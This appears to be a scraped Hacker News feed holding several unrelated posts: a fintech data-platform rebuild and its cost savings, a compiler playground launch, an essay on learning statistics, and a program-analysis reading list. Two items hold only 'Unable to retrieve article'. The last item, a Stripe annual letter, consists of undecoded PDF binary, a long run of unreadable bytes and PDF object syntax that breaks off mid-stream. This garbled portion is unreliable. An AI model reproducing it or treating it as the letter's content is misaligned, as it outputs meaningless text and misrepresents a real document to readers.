    Building and managing a data platform that is both scalable and cost-effective is a challenge many organizations face. We managed an extensive data lake with a lean data team and reduced our Infra Cost by 70%.

    This article explores how we built it and the lessons we learned. Hopefully, some of these insights will be useful (or at least interesting!) for your own data platform projects, regardless of your team size.

    Our Data Landscape#

    We are a fintech startup helping SMEs raise capital from our platform where we provide diverse financial products ranging from Term Loan, Revenue Based Financing to Syndication, we face one unique data challenge: Our data comes from everywhere.

    Our clients often manage their financial information in different ways, leading to data sources ranging from the structured data in our MongoDB and PostgreSQL databases to the semi-structured data found in marketplaces, Google Sheets, and various payment platforms.

    Storing the data was only part of the equation. We needed to process and analyse it at scale, transform it into actionable intelligence that drive key business decisions. Our data and BI analysts play a crucial role in this process, requiring robust data tooling to effectively access, analyze, and visualize the data. From lead generation and risk analysis to payment alerting and reconciliation, data is at the heart of our operations, and our data platform needs to support these critical workflows throughout the entire application lifecycle.

    Our Initial Data Platform#

    Initial Data Platform

    Our initial data platform was built on a foundation of tools that addressed our early-stage needs, but quickly became insufficient as we scaled. Data ingestion was primarily handled by Hevo, which leveraged Debezium Slots for capturing CDC events from our databases and direct integration with Google Sheets. While Hevo simplified initial data capture, its data transformation capabilities were limited, primarily offering basic functionality like data key deletion and value formatting.

    Revenue data from marketplaces was ingested through an RPA-driven process, with data being directly ingested into Google BigQuery (GBQ) as raw dumps. While this approach was simpler, it came with high costs, as GBQ is priced based on the amount of data queried. Given that the data sizes for each table were in the order of 200-500GBs, the costs quickly escalated.

    Furthermore, a significant portion of queries were executed directly against our live OLTP tables. This direct querying increased the load on our production databases, impacting performance and further contributing to cost increases.

    In the early days, with a smaller team and less data, these engineering decisions were pragmatic and likely solved the immediate problems. However, as our company grew and data demands increased, it became clear that this solution was not scalable and could not meet our evolving requirements. This realization led to the creation of a new data team, with myself and my manager, Aankesh 1, tasked with building a more robust and scalable data platform. We needed a platform that could handle the volume, variety, and complexity of our data, while also providing the necessary tools for efficient analysis and decision-making.

    Our New Data Platform#

    We implemented an ELT stack for our new data platform, leveraging cheap storage to prioritize raw data ingestion and subsequent in-warehouse transformations. We also strategically reused existing software components where they weren’t being fully utilized, further optimizing our development efforts.

    The platform’s development was segmented into two layers: Data Ingestion and Storage & Compute.

    Data Ingestion Layer#

    Data Ingestion
    • Debezium: Implemented for capturing CDC events from PostgreSQL and MongoDB, enabling real-time data replication.
    • Airflow: Utilized to orchestrate manual data ingestion from sources like Google Sheets and CSV files.
    • Kafka & Kafka Connect:
      • Formed the core of our streaming data pipeline.
      • Leveraged custom Single Message Transforms (SMTs) for specialized transformations.
      • Self-managed and hosted Kafka Connect cluster for fine-grained control.
      • Utilized managed Confluent Cloud for our Kafka Connect cluster, leveraging our existing infrastructure used for application pub-sub systems.
    • Sink Connectors: Employed Kafka Connect Sink Connectors to deliver data to downstream destinations, including:
      • File storage (S3).
      • PostgreSQL for data replication.

    Storage & Compute Layer#

    Data Processing
    • Data Storage
      • All raw data, ingested from our diverse sources, is persisted in file storage (S3) in Parquet format. This choice offers significant advantages: Parquet’s columnar storage optimizes query performance, and S3 provides cost-effective and highly durable storage.
    • Data Transformation and Quality
      • Airflow orchestrates dbt runs, enabling us to build modular, testable, and maintainable data transformation pipelines. dbt’s transformation logic, expressed as SQL, simplifies the process and allows for version control.
      • Great Expectations is integrated into our pipelines to ensure comprehensive data validation checks at every stage. This helps us detect and address data quality issues early, preventing downstream errors.
      • dbt docs are used for good documentations. This allows for data lineage tracking, and helps downstream consumers discover and understand the datasets we curate for them.
    • Ad-Hoc Analysis
      • Depending on dataset size and query patterns, we also leverage DuckDB for ad-hoc analysis and rapid prototyping. DuckDB’s in-process, embeddable nature allows for fast, interactive querying, particularly for smaller datasets or exploratory analysis.
    • Medallion Architecture: Organizing Data for Consumption
      • We implemented a medallion architecture (Bronze, Silver, Gold) to organize our data for optimal consumption.
      • The Bronze layer stores raw data, the Silver layer contains cleaned and conformed data, and the Gold layer provides business-ready datasets.
      • The Gold layer is further refined to create fine-grained datasets tailored to specific data access patterns. This approach minimizes data scanning during queries, significantly optimizing query performance, especially for frequently accessed data.

    To enable efficient data discovery and querying:

    • Data Discovery: Data Indexing and Metastore
      • AWS Glue crawlers automatically index data in S3, updating metadata as new data arrives.
      • The AWS Glue Data Catalog serves as our Hive Metastore, providing a centralized repository for metadata. This allows Trino to efficiently locate and access data across our data lake.
    • Querying and Visualization
      • Trino is integrated with the Hive Metastore for distributed querying, enabling us to query data across our data lake using standard SQL. Trino’s ability to federate queries across multiple data sources provides flexibility.
      • Metabase is linked to Trino, providing a user-friendly data visualization layer. This empowers our data and BI teams to create interactive reports and dashboards, driving data-driven decisions throughout the organization.

    Analyzing the Cost Reduction#

    Our cost reduction was realized through maximizing the utilization of our current infrastructure and transitioning away from expensive managed services.

    Old Data PlatformNew Architecture
    Hevo: 300~500$Connect Cluster : ~150$
    GBQ : ~750$Airflow: ~160$
    Postgres: 1000$Trino: ~160$
    Glue: ~10$
    Total: ~2200$ *Total: ~460$ *

    * All costs are monthly.


    Acknowledgments#

    I would like to thank my stunning data team and managers - Aankesh, Deepak and Prashant for enabling the team

    ]]>
    http://jchandra.com/posts/data-infra/ hacker-news-small-sites-43197102 Thu, 27 Feb 2025 18:38:49 GMT
    <![CDATA[Show HN: Compiler Playground for energy-efficient embedded dataflow processor]]> thread link) | @keyi
    February 27, 2025 | https://www.efficient.computer/resources/effcc-compiler-playground-launch | archive.org

    We’re excited to announce the official launch of our effcc Compiler Playground, a new, interactive software ecosystem for our processor. For the first time, developers can now sign up to experience the performance of our breakthrough processor architecture and see first-hand how it can offer orders of magnitude greater energy efficiency.

    As developers ourselves, we have experienced the frustrations of compiler friction and complexity. The effcc Compiler Playground was created to offer an interactive first look at our compiler and demonstrate how code is distributed and executed on the Fabric architecture. Just write or copy and paste C code into the Playground and the effcc Compiler automatically maps your code onto the Efficient dataflow architecture, identifying the most energy-efficient and performant representation for the Efficient Fabric. The visualization shows how your code is distributed to the tiles of the Fabric - the core architecture of the processor. Additionally, the Playground highlights the execution flow of the code, cycle-to-cycle, illuminating each operation tile-to-tile. 

    The Playground also presents a debugger feature, which enables developers to see placement and routes at a more granular level. By zeroing in on specific tiles, users are provided with a more detailed look at how operations will function on the Efficient processor. This enables developers to quickly and intuitively optimize the performance of their code for the processor.

    Finally, the Playground also offers visual energy estimates of battery life for a given application. This allows users to get a sense of the orders of magnitude improvement in energy efficiency when running an application on our Fabric processor compared to other processors available on the market today. The populated graph illustrates how much longer an application can run (in years) with our processor versus the alternatives.

    We’re thrilled to share this first look at the Efficient processor architecture’s class-defining efficiency and exceptional developer experience. We’re committed to empowering our community with the necessary tools to push the boundaries of efficiency, while creating innovative, general-purpose computing applications. Please apply for our Early Access Program for the Playground to experience the benefits first hand. 

    ]]>
    https://www.efficient.computer/resources/effcc-compiler-playground-launch hacker-news-small-sites-43197100 Thu, 27 Feb 2025 18:38:47 GMT
    <![CDATA[How to Learn Statistics]]> thread link) | @lakesare
    February 27, 2025 | https://page.brick.do/how-to-learn-statistics-w06NrnP3j0L3 | archive.org

    Tl;dr: you can't. 

    Just kidding, but this will be a short read, so you won't need a tl;dr. 

    You can't learn statistics, because the kind of statistics you are probably interested in learning is not really a scientific discipline, let alone a branch of mathematics. It's a craft, like surgery. You do need to learn some basic anatomy (random variables, hypothesis testing, etc.), but these concepts won't become intuitive until you start practicing. 

    The best way to master a craft is through apprenticeship. Take any statistics 101 course and look for a research internship. Most labs do statistics at some point or another. Make sure there is actually somebody in the lab who knows statistics well, though they don't necessarily need to be a statistician.  

    Once you start reading on how to do the thing your senior colleague told you to do, you will encounter terminology that sounds like everyday language but has specific, often unintuitive definitions in the context of statistics. If you're not familiar with those definitions, you will find yourself re-reading the same sentence multiple times, wondering why it doesn't make sense. 

    Case in point

    The trick is to treat each word as a potential technical term, and look up each one to make sure you understand it fully. Spaced repetition will speed up this process a lot.

    As a concluding remark, ChatGPT agreeing with my analogy:

    New "consult your physician" just dropped
    ]]>
    https://page.brick.do/how-to-learn-statistics-w06NrnP3j0L3 hacker-news-small-sites-43197064 Thu, 27 Feb 2025 18:35:00 GMT
    <![CDATA[Game to Detect Audio Deepfakes]]> thread link) | @muellern
    February 27, 2025 | https://deepfake-total.com/spot_the_deepfake/ | archive.org

    Unable to retrieve article]]>
    https://deepfake-total.com/spot_the_deepfake/ hacker-news-small-sites-43196941 Thu, 27 Feb 2025 18:22:23 GMT
    <![CDATA[Program-Analysis-Reading-List]]> thread link) | @nill0
    February 27, 2025 | https://www.msreverseengineering.com/program-analysis-reading-list | archive.org

    Computer Science:

    Mathematics:  I was advantaged in that I did my undergraduate degree in the subject. Here's what I can recommend, given eleven years' worth of hindsight studying program analysis:

    • You run into abstract algebra a lot in program analysis as well as in cryptography, so it's best to begin with a solid foundation along those lines. There's a lot of debate as to what the best text is. If you're never touched the subject before, Gallian is very approachable, if not as deep and rigorous as something like Dummit and Foote .
    • Order theory is everywhere in program analysis. Introduction to Lattices and Order is the standard (read at least the first two chapters; the more you read, the better), but I recently picked up Lattices and Ordered Algebraic Structures and am enjoying it.
    • Complexity theory. Arora and Barak is recommended.
    • Formal logic is also everywhere. For this, I recommend the first few chapters in The Calculus of Computation (this is an excellent book; read the whole thing).
    • Computability, undecidability, etc. Not entirely separate from previous entries, but read something that treats e.g. Goedel's theorems, for instance The Undecidable .
    • Decision procedures. Read Decision Procedures.
    • For an extensive treatment of SAT solvers and their applications, read Handbook of Satisfiability.  For something math-ier, try Introduction to the Mathematics of Satisfiability.
    • I wish I had studied set theory sooner in my program analysis career. Many concepts from set theory recur in abstract interpretation -- and they're harder in set theory, so if you study that first, you will have a solid background for reading abstract interpretation. A good treatment of set theory will utilize partial orderings, descending and ascending chain conditions, ordinal theory, definition by transfinite recursion, and some fixedpoint theorems. I used Set Theory and the Continuum Problem, and recommend it for its exposition (while lamenting its many typographical errors).

    Program analysis, the "accessible" variety.

    Program analysis, the "serious" variety. 

    • Principles of Program Analysis is an excellent book, but you'll find it very difficult even if you understand all of the above. Similarly, Cousot's MIT lecture course is great but largely unapproachable to the beginner. I highly recommend Value-Range Analysis of C Programs , which is a rare and thorough glimpse into the development of an extremely sophisticated static analyzer. Although this book is heavily mathematical, it's substantially less insane than Principles of Program Analysis. I also found Gogul Balakrishnan's Ph.D. thesis Johannes Kinder's Ph.D. thesis Mila Dalla Preda's Ph.D. thesisAntoine Mine's Ph.D. thesis, and Davidson Rodrigo Boccardo's Ph.D. thesis useful.
    • If you've gotten to this point, you'll probably begin to develop a very selective taste for program analysis literature: in particular, if it does not have a lot of mathematics (actual math, not just simple concepts formalized), you might decide that it is unlikely to contain a lasting and valuable contribution. At this point, read papers from CAVSAS, and VMCAI. Some of my favorite researchers are the Z3 teamMila Dalla PredaJoerg BrauerAndy KingAxel SimonRoberto Giacobazzi, and Patrick Cousot.
    • Although I've tried to lay out a reasonable course of study hereinbefore regarding the mathematics you need to understand this kind of material, around this point in the course you'll find that the creature we're dealing with here is an octopus whose tentacles spread in every direction. In particular, you can expect to encounter topology, category theory, tropical geometry, numerical mathematics, and many other disciplines. Program analysis is multi-disciplinary and has a hard time keeping itself shoehorned in one or two corners of mathematics.
    • After several years of wading through program analysis, you start to understand that there must be some connection between theorem-prover based methods and abstract interpretation, since after all, they both can be applied statically and can potentially produce similar information. But what is the connection? Recent publications by Vijay D'Silva et al (12345) and a few others (1 2 3 4) have begun to plough this territory.

    Final bit of advice: you'll notice that I heavily stuck to textbooks and Ph.D. theses in the above list. I find that jumping straight into the research literature without a foundational grounding is perhaps the most ill-advised mistake one can make intellectually. To whatever extent that what you're interested in is systematized -- that is, covered in a textbook or thesis already, you should read it before digging into the research literature. Otherwise, you'll be the proverbial blind man with the elephant, groping around in the dark, getting bits and pieces of the picture without understanding how it all forms a cohesive whole. I made that mistake and it cost me a lot of time; don't do the same.

    ]]>
    https://www.msreverseengineering.com/program-analysis-reading-list hacker-news-small-sites-43196903 Thu, 27 Feb 2025 18:17:39 GMT
    <![CDATA[ADHD Guide to Spaced Repetition]]> thread link) | @lakesare
    February 27, 2025 | https://page.brick.do/adhd-guide-to-spaced-repetition-4ja9ZO4DXLM2 | archive.org

    Unable to retrieve article]]>
    https://page.brick.do/adhd-guide-to-spaced-repetition-4ja9ZO4DXLM2 hacker-news-small-sites-43196788 Thu, 27 Feb 2025 18:04:15 GMT
    <![CDATA[Stripe Annual Letter [pdf]]]> thread link) | @charlieirish
    February 27, 2025 | https://assets.stripeassets.com/fzn2n1nzq965/2pt3yIHthraqR1KwXgr98U/df10795aac0205789956c89e0dfc4f1a/Stripe-annual-letter-2024.pdf | archive.org

    /ÄçàKñ'ñø~üsü A�`@p"x„µ„"B ¡�p‹0F˜!*�ˆ.ÄPb"q+±ŒØ@¼L|H|C"‘tIޤå$i ©Œtšt•4BúHV"›’Yäh²„¼›|œÜI¾O~C¡P )î”(Š˜²›RG¹DyLù G•³�cËñä6ËUÈ5Ëõ˽’'ÈÈ{ȯ–_'_*Vþ–ü¤AÁP�¥ÀQؤP¡pNaHaZ‘ªh­¨˜¢X¨xRñšâ¸NÉPÉ[‰§”«tLé’Ò(EÕ£²¨\ê6j õ2uŒ†¥ÑØ´DZí'Z/mJYIÙV9L9[¹Bù¼²T¥b¨ÂVIV)R9£2¨òi�æ�ü»4,è_ð^u¡ª»*_5_µQu@õ“]Í[-Im¯Z‹Ú#u´º©úrõ,õÃê—Õ'Ò:/ä.Ì_xfá XÃT#Xc½Æ1�›ÓšZš¾šiš5/iNj©h¹k%j•huhMhSµ]µÚ%Ú´_Еéôdz½›>¥£¡ã§#Ñ©ÒéÕ™Ñ5Ò]¡›£Û¨ûH�¨ÇÔ‹Ó+ÑëÒ›Ò×Ö_ª¿A¿^ÿ�Á€i�`pÀ Çཡ‘a¸áÃÃq#U#¶Ñ:£z£‡Æc7ãtãjã»&X¦I’É!“Û¦°©�i‚i…é-3ØÌÞL`vȬÏcîh.4¯6b�ŒLF=cÄBÅb‰EŽE‹Å+K}Ë(˽–=–_­ì¬’­j¬†­•¬ý­s¬Û¬ÿ²1µáÚTØÜ]DYä³hó¢ÖE¯mÍlù¶‡mïÙQí–Úí°ë²ûbï`/²o°ŸpÐwˆq¨tbÒ˜AÌBæUGŒ£§ãfÇvÇ�NöNb§3N:3œ“œO:�/6ZÌ_\³xÔE×…ãRå"u¥»Æ¸u•ºé¸qܪݞºë¹óÜkÝŸ{˜x$zœòxåiå)òlò|Ïrbmduz¡¼|½ò½z½•¼Wx—{?öÑõ‰÷©÷™òµó]ïÛé‡ñ ðÛë7ÄÖdsÙuì)ÿ�þÝä€�€ò€§KL—ˆ–´-…—ú/Ý·ôá2ƒeÂe-� �¸/ðQ�QPzЯ˱˃–W,l¼!¸'„²&ädÈ»PÏТÐáÆ+$+ºÂäâÃêÂÞ‡{…‡K#,#6F܈T�D¶Fá¢Â¢j£¦Wz¯Ü¿r,Ú.:/zp•ѪìU×V«¯N^}~�üΚ³1˜˜ð˜“1Ÿ9�œjÎt,;¶2vŠËâà¾ä¹óJx|~1ÿyœK\qÜx¼Kü¾ø‰·„Ò„IKP.x�è—x$ñ}R`Òñ¤ÙäðäÆ|JLÊ9¡’0IØ�ª•š�Ú—f––—&MwJߟ>% Õf@«2ZÅ4äGrSb,Ù.ÉtͬÈü�–u6[1[˜}s­éÚ]kŸ¯óY÷ãzôzîú® :¶nÙè±±j´)vS×f½Í¹›Ç¶øn9±•¸5iëo9V9Å9o·…okËÕÌÝ’;ºÝw{}ž\ž(oh‡óŽ#;Ñ;;{w-Úup××|^þõ«‚Ò‚Ï…ÜÂë?XÿPöÃìî¸Ý½EöE‡÷`÷÷ îuÛ{¢X±x]ñè¾¥ûšKè%ù%o÷¯Ù­Ô¶ôÈâÉiÙ’²Öƒú÷ü\žP>PáYÑX©Q¹«òý!Þ¡þÃh)8òé¨àè½*ߪæjÃêÒcØc™ÇžÕ„ÕôüÈü±®V½¶ öËqáqé‰àÝuuu'5NÕÃõ’ú‰SѧnÿäõSk£¡ªQ¥±à48-9ýâ瘟Ïœé:Ë<Ûð‹Á/•MÔ¦üf¨ymóTKB‹´5²µïœÿ¹®6綦_-~=Þ®Ó^q^ù|Q±#·cöº Ó�i�“ã/Žv­é¾qén÷òîÞË—¯^ñ¹r©Ç£çÂU—«íל®�»Î¼ÞrÃþFóM»›M¿ÙýÖÔkßÛ|ËáVëmÇÛm}‹û:úÝú/Þñºså.ûî��e}ƒ+ï EIïñî�ßO¾ÿúA惙á-1ó)<*}¬ñ¸ú‰É“F©½ôüˆ×Èͧ!O‡G¹£/ÏøýóXî3ʳÒçÚÏëÆmÆÛ'|&n¿XùbìeÚ˙ɼ?ÿ¨|eüê—?Ýÿ¼915öZôzö¯Â7joŽ¿µ}Û54ýø]Ê»™÷ùÔ>œøÈüØó)üÓó™¬Ï¸Ïe_L¾´} øúp6evö;bÁöfÑí­íí6 kº?Ž#IÓeÎŽ•šœ*ÑCÒ8\>�A—™•ÿ›O‰=@ËvT|‹! šÌ{²9AàŸWw¹d^kÇ·Xj5ÌiP{2ñs1Vp(ý»90‚ùq|_ˆl5LÀÏã‘ý y± UHéÓÿ¾ó¿ë[Ÿß¼±˜Ÿ-žë35m­HŸ ¦³…b¾HÈ‘uÄIž;‘¬ÇŒT‘X I1§#NÒ€Œ¸E6sKAdÄ#cžÌξ1WÀ—¢ÙÙ™ªÙÙ/È,PÃtJþ�Ñ# endstream endobj 270 0 obj 2567 endobj 271 0 obj [ /ICCBased 269 0 R ] endobj 272 0 obj << /Font << /F1 268 0 R >> /ExtGState << /E2 << /ca 0.200000 >> /E1 << /ca 0.200000 >> >> /ColorSpace << /C1 271 0 R >> >> endobj 273 0 obj << /Filter /FlateDecode /Length 274 0 R >> stream xìýA¯$É’¦éíóWärš@E»›»™¹o9.¸#X;W 4kq³¢ùÿÁçSUSó8ž˜žuEuß{âusQQQQQQ;qÿëÿzÿóýþñ_ý×_ÿã�ÿï÷_·öçÏÛñÿ͟~ÿlþð×ßç7ÿáüõßÿ˜�îïÇñãßl÷åøKáÿª|~ñ_§ŒùCa—ïÿÇÿí�ÿþÇÿãÿ¨A�õøilÇ�lòäý¾ok¾¼?×{¤Üû²®Í¦uùõ^oÛöúóýëq_¶õŤçú‹*Ïu?á¿ßë~Ûî¿Ö÷ë±o>÷_Ë}ñ t{æ>_¿¶Ç~{o'úë�ÕØ¯×þ¾Ÿp½ÿZÖ÷íMÝ_�ýy¿þ¤Ê²¼ž·7ôz?^{ûê„Ï_ïç¶¼VªäË�õy3ý|ùùçóýëM“ÇýÏǯ÷ö¸-¯¨Âpß>Ñ_<Ÿ¿¶ûúxp؟˯ûÂ[ûŸÛ/¢^÷GA÷Û¯�{¨ç»'5îcy?(ð¤Êvç¿;g¼ï¯�Àý×~>ßž›Œ%÷_~z¼…®s¾#q§í­2c?në»ù¡Òeßö—'ÍÕÌíû—‰}pRÐÇtþ%’h´½ïËsiãÜxjÍ4o¿ö}<¶BÍò¾Ý7Z>~mÛò eaBZ𼞤ò¸)Ø_¬œT”œ4ß¿=_Âäõk}½9eœ4Цb÷±¾žËûœŸ¿ÿHlïïÛ³Lîƒßßûm1ó¿ÖÛc7A�s–Ûvƒ^¯×S”ýõGàö\ž {Æîû›’Kàöa —úsÀýö¢Q¢ôµíKèã×óy»=ŸŸt½oû“•bæù|>b;�në²òºÝ-¶Gô|?­Èw¾ŸY·îbã‹ÎëÁÞïhúòäk‰—&}Þ=LÃyé½ïÏm¯ŒI÷×m—÷þ8©Å¿‰ÌåÏo÷ê5#x·9}åÃ-i˜›PÂyÝRÙöýÎÈI1ëí%øLïÞ<Óü¾ÝDHØcÙ–{3}-϶À_¯÷j¦š‡ÊcI"XyS�¶ç{y&aÜßës㳩ÎDäm¿^÷Mø°Î¶•>J:Ûþ^+â‰h½ÅÂB—_ëz_-áÈ3qâ¦X7>Yü³ˆ¿-#dj¨� øû�åõËľv¾˜ô_…ŠÐåùàp øÖï×Ñyîþ~H$u´Årk<}ÒûÛ"Ü$æÐ)áþ’žÖ·Yé)·�ço²é.Äe�ûky=2Þ¤EeŠ®¯»½ágè§iÇr3_ÏÝòÿ ï]¶ú¶“m·„Þ½¶eÝÚÒ[ŸVÎóÏEúxK�-˲JS‹ðñ YÁnÏ}y%ô õ�—e׬ËíÅKèëáá{<'÷ûZ›ßí¹Z%ÆvžÖgÎ}KÞxÝ7Áµ/,Í”Ÿpûµnûƒö±ãùfЏ\¯Õ×­~kd1àþë¹l7úüõÇ Ÿ2Š|u§d¾ü¸mÖcl¸=îÍ/,‹7ûõƒQ_Ö�©�ˆ¼;[—ÍâŸPÈ[÷÷ò§8¶ |7‘%°¡©îFåš÷¯çã!AE¶=Þo�š$ÑqoáÚ-n.·�%Àš1Ö´1¦tZ^Ù5ÑSÂ�tº7±øþå�§ÝùõëÆ©�Dþd믧eI¦0eÉuvÓ¹Ïò§ñ$â‚o¥àêH{ù-�$zåÿí)ÿÃT„ËŸ*”¿TLƒY;¯m•º©kè×b'¶mIæ‰t‰¢)s7¯Òvt€ZÖêĶmQòp"a0S³¾ºv^qp6ß¹¤o°÷¯}_šZñþ ÷Û}õÑ$|y7ÇöÒ(�ø“8JYeÂ¥‹Ezªüö¾§^°™X1âòDýa'³6¥äŠßÛën’ »Jä§lwi²ÇY–k’ý ©²ï7Nÿ×–²�(û©¥èÏz³jnö8ŸZü±>ã5�X´ÙÍä'Ë«BñbÜÚ/ËÍFPÑþ+ äúÀ—­ dS�ÇÌcÈ ¶é;Ÿ÷8Ëšÿoÿ—Qqÿ×ÿíþçÿç˜užôçtõÿ\áÝþœ_ž?ügáÝàYO'ôþ³ðVBµ"[ÿgáíû­¼l9ªÒÿ,¼%öx¦ùý? ïN|“ŠÐ£6=üë÷ëh) í�IMù(býñôIÕPÿYxûŽ=\AA¦øS]ñúŸ…7UØýŸ…÷Þ©l&VŒ¸<ÑÞ¥ðžUõtçO÷nvÛŸ?í„v“÷›óZɽÜ×MæóÃÑël–\+¹ïÒ�Úlõ½“ø|Mümxå�ÕÚzý@…Íùž¿,$O¼ %jd Ý ý‰f¹üDeŸ÷¤s¼Ÿ©t)�*´ë�ö3U¨�~¦ÕŒ˜mQ‘A¹óƒæ%ÙSqà0ჷm¬}p_²ÕÁï‚-œ í<ùá•JÖ>=¥¿“šˆôB42otHT=»ymøè•àÌ·tŒü˓˯mÅšÄý“Ùóú(ùv¡2ph\óúå¸ãoŸTüf|&Ù2üiŠ®:P²3šNG ˜Áü%øú¬u1 §`¦X“@ÁñdÐVµÄ+ð³{šbð")ù ¹…ªŸ"bí�Y¹(6`VZû sðà±ýÞ,î3;¼3iØíEîŽÅ5�MÏ¿?mï‚Ü·¥�ƒFY4Ï*Ä_£a�nî9ÎuM�¼T¶&dâ™Ð£sãTƒÙ�"r[NC'¾«rß’’ÁMÊab <¦f¼u7ÆŒŠÇ€±#Y”ˆªÇ×õ~Êø™š×øò C7 ¥?[Œ(A>í�,Ú&³ Î½;y¬ÆQuš²Ã哉º¹O*Àö{3ªˆdéôàý„}~µú éö�dso³P¨®ETè¦j8eW„ÄVbò5ÉwEgƒvÇ'›·Œ¾ò�ÒÉñÄ�g)†IMµÝ&wB†�öNj{Æ 2ÍÊÁæð“åÛSÓI‹Iòrƹ°é’î*ËF …TÚ�j¡¬³ñT@·Èó„ðáIýЇãCtQJªsœ¥Dr?¦$Ñ´ !äDš�Ý„MÆT1ÿj!8èýi.,iÌW~`·c5z@¥‡* ¾ØuÁꃚè)ãgz±5[ Ž©’@£±@ñiò°çÁ¤–8¶ù¯³hËSŽ�íÛƒ†é½L!Öí ~Æ ¬M.S\ÌêÓ¥´ò�zkš�éšô|<6¨Óà‹”O,ÉžX©¢Ô VûúCÁÕijÍícíÞ9¨?9`ŒVm‹9µõ‰O©él4©'T\Í=çÄ~èÆE/%!ªŠý™Úµº7/”àc•ƒ:7]Ѝp@ j6`TP§Þš '<FjNJ¨ÖKèf¥zQvÎO¡™Í—˜ÞFóØ˜ 6Íšy�ª;#ê©ö*¶6P?5¸‚-19 øÓàûö’‡dêÁ7'æ ¦Ÿ¥ŸVá ·™�Ъ¯à” ª±{‚v²ò§Éõ5Ov¹Û˜eP;ph«çà(Of¨öä€h>Ÿ°Òdâ¸G?s¸G#ÍŸ ´m÷Š€‰MQ�‡&´[@“±h*õ©ðmª¾ùPfcjb&èBó•OjñæYY“œµ:±#=éÕ-�,#‰SÞ¾=hôÓJ"4ØnÌØ�íÛ¬tÎÔW8)�Щ‘ph¾?dÊ,ÝÎŒí 'OF¦˜ÐMüL6¾}J<tÍû·5#R[lsÉPÊV¤?-„'æži͆¯LOÏ—�ÞPÛ£™îþ�]Xýûz»ÌP£(¥Ú‡Ò pø@L-]ß ´Îe1 t•¯3«'�ªÉêÏƶD®yïÊaQ®1\_á'j‡¶½„ìˆw& ÝÇñC–„¤$8ö]LóDÏ;,é‡0{¿ÿÉb…v@z:™ËAÃî/Lƒ×jû��ûîIO¢’Dû2Tµë‚K¢+2~¦[µzœ24oÏ}sKÐ¥»)[·86»Â`Ñ–W4™+ {ë¯Qëv5ÖýŒAXŸ®ô?–wö�iVŸ.a£ ¤çöo´M2ÌÁi¹tù·Ç!Z ;(C©Ð(ÕÛ�´ N…ÝTIb.NxsǤ1 ¶`Jˆi¦“ ÀÐ.àÄVb¢¼OäÆ+¸gÉ@ëõ€GèRìšÉ #W>õ½ Ô®²m7©ÚRvÊX¦êi´ p 5 ¶%¤hÝ4úªxbÛ%(Ñ­¸P9ŒÁV•6S†ƒ7‹1ªe’χ7ƒÇi¿‰ømÞZzÚô=\iŠ)êÕ™öÁëž%œþøà¾‰˜‡ —d¨*ºøm×8&%;ŒnO¨·£–5œ¼2­\â­Pý‘&õÌç[ïr°êÛ½%«©h ñ»û¶kw·¡“’~RÞàæA•ÔD“ð3U:÷=#Ô_¬2�]?ü@/£Ù u�©’Ö`ó�Ý´—Hµ®âå ;Mãæ]ñš–x]²‘:qÊ̦±,ÃÉy­KýÝ/-çã®s´t‹ØîÈ•õOwl—*–•Ì 5rò�Xh%2[+IÛÒ+Éï-Œ>×�[2ZƒI¯Ý'& ?¹éÞ0F(ÂIÛ24¸ó�+ðÙu¨�b}‡èrO<Œîr£ Ž“ô講{�æî=Åw3Á#pyï%Q><Ÿs[BË,ÿv¹âã¬+óõjÁg=_d®3‡…žy”Dâ®°Ïìhì—*‚®“åÛÂf»Ò0Í܇ë�3�VVÆžT¤%sô']0<\瘃Ã%fX¬Ó·9Éý”LrRÞ@¥«Øãû¬@Ã$E7†Ø‘GOF£DyËF'=óhFïÏìo<�}Í£ñeÊ¥¬òAï/+'³óÁ|ÂòíIÅT¼‘™°Ó‡‡ÎhwLÔ=2SâwR‘Ñó�“µ°ºK½ìVùšæì`±0Zx²z÷-ZžX_ŸT5Ÿ`ä¶S¤U 56GŸ,ßžŠNZ *'+cs‰Yqźºé¥|  7[n.Å[Î!ÇYo ÆFdãöEbÈŸo+ÇÃ.mÏ ˆ©r#àÌ€'³æ- =3 &ÿ÷;ï#¯[''ºN–oK3땆©:¢�¨Œ[>X{Ò3bŽ΢ؑ±a·Åß%æÛ:;è’\7h¼¡Ä§'{|?NÊ÷¹Ó8Kú´G<�f<é™3z—XVo¤«¾�,ßæK½kºOê‹Ù»»‡Ž x2 aùö¤VX¼álxˆb‘f¢úØ5ÒÒ!%š'dfª{[·O·uû�È 6 ˜ú�pl�§)·�ù`<ߨéfÙÌ)½Ç =ñ›÷>ÚãÎu±¦ÏØ.£—:PËB?�‡¢æ§Ë�GÖ¨‘.”y1+ûžƒýA_fm;l—¦Xå%§3B-Ê–Éþ2¾…‡*’&�Nö€Œ|2‰1ÏeŽ •/ wE¤®¢ÿ‹�Ìjt á¼tpÂL²4C›¿Î$¼bQÛŸ|ÓŸ×8*ÅÒ¸áé߉úB'•l{ŸÝb”Áè’ú3ø‰®/;©ÇPU­c—4ëÙ½EÓÀ�;|ðĵ µ¤ûª s¡¥$Ëð‹¨âªÉb”óʨIÜ­¢‘99fYV//Šÿg÷ÿò§Ãª¦ÖÓ�ëùßÿ{ì|ÚúÞä”wû;YŽùΫOþþñùÝ×þßþûÿý�ÿíßÿ�;ô$.Þü·?qçüü÷ò6ÌüÖªwã¿ý‘_ÜÅ)üÿÔo³^¾ÿ?#3DLsÞªtd“®3G»Rðƒ«j•»Ex¾á3=]0¹ÉÎ{eÉ¥ÎNëŸü¤úÄz,’ M³+åºâJåzq{¥–üòÌ+8Omx«æéúãdbnuÞñã_*}o�§…vJY^-;ôp„Ó›�ú¢–'õ©o7•½ˆ}¾Ýkäý¹ƒº„Xž:�?I\omœ›ö¥ž¼=3ï²æ„,S ™Y?|HI{~ŠPç)·`sMâG.˜yR/p½:ãê&5Š™¯Üo»”— (‘,jNOqÕ„¥ß�؉A�ïãY‡eSàëÍÜ@•EîYòv`´½qWÐ ¥X«Té�™ ßgÞÅMŽLeßà˜˜ªØ„Ù@|°ì$û€Ïôò8Å䲎Ü&ùÄÉå|Þuù7×H�/ɾ½oË yþŠéËäÝÓ¤Âzxù|8wù)bÇP?ªÕôUÝ»(‘”bH�Rš<œ#ó�Û�͉Ò+Öia•Ýô׺ÛFm è˜YjIðf�f)¾íASR®zýx²Cå¾�Ç)äãY‡ì§3­dZŠ ™S¼7OC(&áÝõ ÷ǺmÏî ŸB¾aÊùÓ�¶#Ü]+ô„š:Ž}vœþ¬ í¥¨<9 �9H ?´\…à€îSìIàt;Åúl´ù“Bô=uAŠ}mþ|°[Tù@Ì­k’“ùsÞyÞì” »Ô +¦¤„ðt°X[ L‘|^nÊ#BT¾ÔSZ5°:)_à_<¨*Õ]ñäh>¤¦ÈÔ[.PüÒØLP°iåLG 